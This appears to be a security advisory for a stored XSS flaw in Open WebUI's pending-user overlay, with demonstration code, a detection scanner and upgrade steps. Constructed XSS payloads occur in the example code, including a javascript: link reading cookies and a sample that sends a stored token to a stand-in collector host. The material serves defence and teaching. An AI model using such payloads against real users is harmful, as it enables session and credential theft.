CVE-2026-44568 Overview
CVE-2026-44568 is a stored cross-site scripting (XSS) vulnerability in Open WebUI, a self-hosted AI platform designed to run fully offline. The flaw is in the AccountPending.svelte component, which renders the admin-configured "Pending User Overlay Content" by passing it through marked.parse() and inserting the result with an {@html} block, with DOMPurify applied in the wrong order (not on the HTML that is actually inserted into the DOM). An administrator can therefore store arbitrary JavaScript in the overlay content, and it executes in the browser of every pending user who views the page. The issue is classified as CWE-79 and is fixed in Open WebUI version 0.9.0.
Critical Impact
A privileged administrator can inject persistent JavaScript that executes in the browser context of pending users, enabling session hijacking, credential theft, or further client-side attacks.
Affected Products
- Open WebUI versions prior to 0.9.0
- Deployments that use the account-approval flow (new users held in a pending state) and show the Pending User Overlay Content rendered by AccountPending.svelte
- Deployments with more than one administrator, or where an administrator account cannot be fully trusted, since exploitation requires admin privileges
Discovery Timeline
- 2026-05-15 - CVE-2026-44568 published to NVD
- 2026-05-19 - Last updated in NVD database
Technical Details for CVE-2026-44568
Vulnerability Analysis
The vulnerability resides in the AccountPending.svelte component of Open WebUI. The component is responsible for rendering an overlay shown to users whose accounts await administrator approval. To support formatted text, the overlay passes admin-supplied content through marked.parse(), which converts Markdown into HTML, and then injects the result into the DOM via Svelte's {@html} directive.
DOMPurify is applied to the Markdown source rather than to the HTML that marked.parse() produces, so the markup actually inserted into the DOM is never sanitized. Anything the Markdown parser turns into HTML after the sanitizer has run escapes it: for example, link syntax whose destination is a javascript: URL is plain text to an HTML sanitizer but becomes an <a href> after parsing. The result is a stored XSS primitive that fires automatically on page load for any pending user, with no interaction beyond opening the page.
Root Cause
The root cause is improper neutralization of input during web page generation [CWE-79]. Sanitization must operate on the final HTML output that will be inserted into the DOM. In this component, DOMPurify is invoked at a stage that allows marked.parse() to reintroduce or preserve unsafe HTML, including inline event handlers and script-bearing attributes, before rendering through {@html}.
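The ordering problem described above, as an added example that is not code from Open WebUI or its advisory. renderMarkdown() and sanitizeHtml() are deliberately tiny stand-ins for marked.parse() and DOMPurify.sanitize() (a handful of regexes, not a real sanitizer), and the overlay strings are constructed for the demonstration. The point it shows is that sanitizing before parsing leaves whatever the parser generates unsanitized, while a raw-HTML payload is stripped in both orders and so would not reveal the bug in a quick test.

```javascript
// Added example (not code from Open WebUI or its advisory): why the order of
// sanitization and Markdown rendering matters for {@html}-style insertion.
// renderMarkdown() and sanitizeHtml() are deliberately tiny stand-ins for
// marked.parse() and DOMPurify.sanitize(); the overlay strings are constructed.

// Stand-in Markdown renderer: turns [text](url) into a link and, like a real
// Markdown renderer, passes any raw HTML through unchanged.
function renderMarkdown(md) {
  return md.replace(/\[([^\]]+)\]\((\S+?)\)(?=\s|$)/g,
    (_m, text, url) => `<a href="${url}">${text}</a>`);
}

// Stand-in sanitizer: drops <script> elements, inline on* handlers and
// javascript: URLs in href/src. Not a DOMPurify replacement; it exists only
// to make the ordering problem visible.
function sanitizeHtml(html) {
  return html
    .replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, "")
    .replace(/\s+on\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, "")
    .replace(/\s+(?:href|src)\s*=\s*(["']?)\s*javascript:[^"'\s>]*\1/gi, "");
}

// Vulnerable order (the pattern this CVE describes): the sanitizer only ever
// sees Markdown source. Link syntax is plain text to an HTML sanitizer, so a
// javascript: destination survives and the renderer emits it as an href.
function sanitizeThenRender(md) {
  return renderMarkdown(sanitizeHtml(md));
}

// Fixed order: sanitize the HTML that will actually be inserted into the DOM.
function renderThenSanitize(md) {
  return sanitizeHtml(renderMarkdown(md));
}

function containsJavascriptUrl(html) {
  return /javascript:/i.test(html);
}

// Constructed overlay values for the demonstration.
const OVERLAY_WITH_JS_LINK =
  "Your account is pending. [Contact support](javascript:alert(document.cookie))";
const OVERLAY_WITH_RAW_IMG = '<img src="x" onerror="alert(1)">';

// The raw-HTML payload is stripped in both orders, which is why a quick test
// with only that payload would not reveal the bug; the Markdown link shows it.
console.log("vulnerable:", sanitizeThenRender(OVERLAY_WITH_JS_LINK));
console.log("fixed:     ", renderThenSanitize(OVERLAY_WITH_JS_LINK));
console.log("raw <img>, either order:", renderThenSanitize(OVERLAY_WITH_RAW_IMG));
```

The same reasoning applies to any sanitizer: it must run on the final string handed to {@html}, after every transformation that can produce markup, because a transformation that runs later can always emit something the sanitizer never saw.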
Attack Vector
Exploitation requires high privileges: only an administrator can set the Pending User Overlay Content. The attack is reachable over the network, and the only user interaction needed is a pending user loading the account-pending page, which the application shows them automatically. Once an administrator stores the payload, every pending user who loads the overlay runs the injected JavaScript in their own authenticated browser context under the Open WebUI origin. From there the script can read whatever the front end keeps accessible to JavaScript (session tokens included), call the Open WebUI API with the victim's credentials, or redirect the victim to a phishing page. Note that a pending account has not yet been approved, which limits what the API will let the hijacked session do directly; credential capture and phishing served from a trusted origin are the more likely goals. In CVSS terms the scope is changed: the vulnerable component is the administrator-controlled configuration, but the impact lands in other users' browsers.
No public proof-of-concept code is available. Refer to the GitHub Security Advisory GHSA-fq3v-xjjx-95rc for vendor technical details.
Detection Methods for CVE-2026-44568
Indicators of Compromise
- Unexpected <script> tags, javascript: URIs, or inline event handlers (such as onerror, onload) stored in the Open WebUI Pending User Overlay Content configuration
- Outbound HTTP requests from pending user browsers to unfamiliar domains shortly after loading the account-pending page
- Anomalous session token usage or API calls originating from pending user accounts that have not yet been approved
Detection Strategies
- Audit the Open WebUI database and admin configuration for the Pending User Overlay Content field, searching for HTML tags, script content, or encoded payloads
- Review administrator activity logs for changes to overlay or onboarding configuration made by unexpected accounts
- Inspect browser Content Security Policy (CSP) violation reports for blocked inline script executions on the account-pending route
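The audit in the two lists above (unexpected script tags, javascript: URIs and inline event handlers, including encoded forms) as an added detection example, not part of Open WebUI. It unwraps a few layers of HTML-entity and percent-encoding before matching, and treats a Markdown link with a javascript: destination as an indicator because it only becomes an href after marked.parse() runs. How the stored value is retrieved (admin UI or database) is deployment-specific and left out; the sample values, hostnames and payloads are constructed for this example.

```javascript
// Added detection example (not part of Open WebUI): scan a stored Pending User
// Overlay Content value for the constructs listed above. Nested HTML-entity and
// percent-encoding is unwrapped first so encoded variants are not missed. How the
// value is retrieved (admin UI or database) is deployment-specific and left out;
// the sample values are constructed for this example.

const fromCodePoint = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\uFFFD");

// Unwrap a few layers of &#NNN; / &#xHH; / named entities and %XX encoding.
function decodeLayers(text) {
  let current = text;
  for (let i = 0; i < 3; i++) {
    let next = current
      .replace(/&#x([0-9a-f]+);?/gi, (_m, h) => fromCodePoint(parseInt(h, 16)))
      .replace(/&#(\d+);?/g, (_m, d) => fromCodePoint(parseInt(d, 10)))
      .replace(/&lt;/gi, "<")
      .replace(/&gt;/gi, ">")
      .replace(/&quot;/gi, '"')
      .replace(/&amp;/gi, "&");
    try {
      next = decodeURIComponent(next);
    } catch (_e) {
      // malformed %-sequence: keep the partially decoded text
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Each rule is one indicator from the list above. The javascript: rule covers
// both HTML attributes and Markdown link destinations, since the latter only
// become an href after marked.parse() runs.
const RULES = [
  { name: "script-tag", re: /<\s*script\b/i },
  { name: "javascript-uri",
    re: /(?:href|src|action|formaction|xlink:href)\s*=\s*["']?\s*javascript\s*:|\]\(\s*javascript\s*:/i },
  { name: "event-handler", re: /<[^>]*\s+on[a-z]+\s*=/i },
  { name: "embedded-frame", re: /<\s*(?:iframe|object|embed)\b/i },
];

// Returns the names of the rules that match, checked against the raw value and
// a decoded copy with control characters removed (browsers ignore tabs and
// newlines inside a URL scheme, so "java\tscript:" must still be caught).
function scanOverlayContent(value) {
  const decoded = decodeLayers(value).replace(/[\x00-\x1f]/g, "");
  const findings = RULES.filter((r) => r.re.test(value) || r.re.test(decoded)).map((r) => r.name);
  return { suspicious: findings.length > 0, findings };
}

function scanAll(samples) {
  return Object.fromEntries(
    Object.entries(samples).map(([name, value]) => [name, scanOverlayContent(value).findings]));
}

// Constructed sample values as they might appear in the stored setting.
const CONSTRUCTED_SAMPLES = {
  benign: "Your account is **pending**. Contact the [helpdesk](https://helpdesk.example/tickets).",
  mdJsLink: "Thanks for signing up! [Continue](javascript:alert(document.cookie))",
  entityEncoded: '<a href="&#106;avascript:alert(1)">Continue</a>',
  svgOnload: '<svg onload="fetch(\'https://collector.example/?t=\' + localStorage.token)"></svg>',
  encodedScript: "Welcome &lt;script src=//collector.example/x.js&gt;&lt;/script&gt;",
};

console.log(scanAll(CONSTRUCTED_SAMPLES));
```

The rules are heuristics for an audit, not a sanitizer: a match means a human should look at the value, and a clean result does not prove the content is safe. Legitimate overlay text normally contains only prose and ordinary http(s) links, so any hit in this field deserves follow-up against the administrator activity log.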
Monitoring Recommendations
- Enable verbose audit logging for all administrative configuration changes in Open WebUI
- Monitor reverse proxy or web server logs for /auth and account-pending route traffic correlated with suspicious outbound activity
- Track the deployed Open WebUI version across all instances and alert on any version below 0.9.0
How to Mitigate CVE-2026-44568
Immediate Actions Required
- Upgrade all Open WebUI deployments to version 0.9.0 or later, which contains the fix
- Review and sanitize the existing Pending User Overlay Content configuration, removing any HTML or scripting constructs
- Audit the list of administrator accounts, remove any that are no longer required, and rotate credentials for those that remain
Patch Information
The vulnerability is fixed in Open WebUI 0.9.0. The patch corrects the order of DOMPurify sanitization relative to marked.parse() output in the AccountPending.svelte component so that the final HTML injected through {@html} is sanitized before rendering. See the Open WebUI Security Advisory GHSA-fq3v-xjjx-95rc for vendor guidance.
Workarounds
- Clear the Pending User Overlay Content field until the upgrade can be completed
- Restrict administrative access to trusted personnel only and enforce multi-factor authentication for admin logins
- Deploy a Content Security Policy for the Open WebUI origin that disallows inline scripts and untrusted external script sources; a script-src without 'unsafe-inline' also blocks javascript: links. Roll it out in report-only mode first and confirm the Open WebUI front end still works before enforcing it
# Upgrade Open WebUI to the patched version using Docker
docker pull ghcr.io/open-webui/open-webui:0.9.0
docker stop open-webui
docker rm open-webui
docker run -d --name open-webui \
  -p 3000:8080 \
  -v open-webui:/app/backend/data \
  ghcr.io/open-webui/open-webui:0.9.0
# Verify the running version through the API (env.py only reads the version
# from package.json, so grepping env.py does not print a version number)
curl -s http://localhost:3000/api/version
# Or read it from the image directly
docker exec open-webui cat /app/package.json | grep '"version"'
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


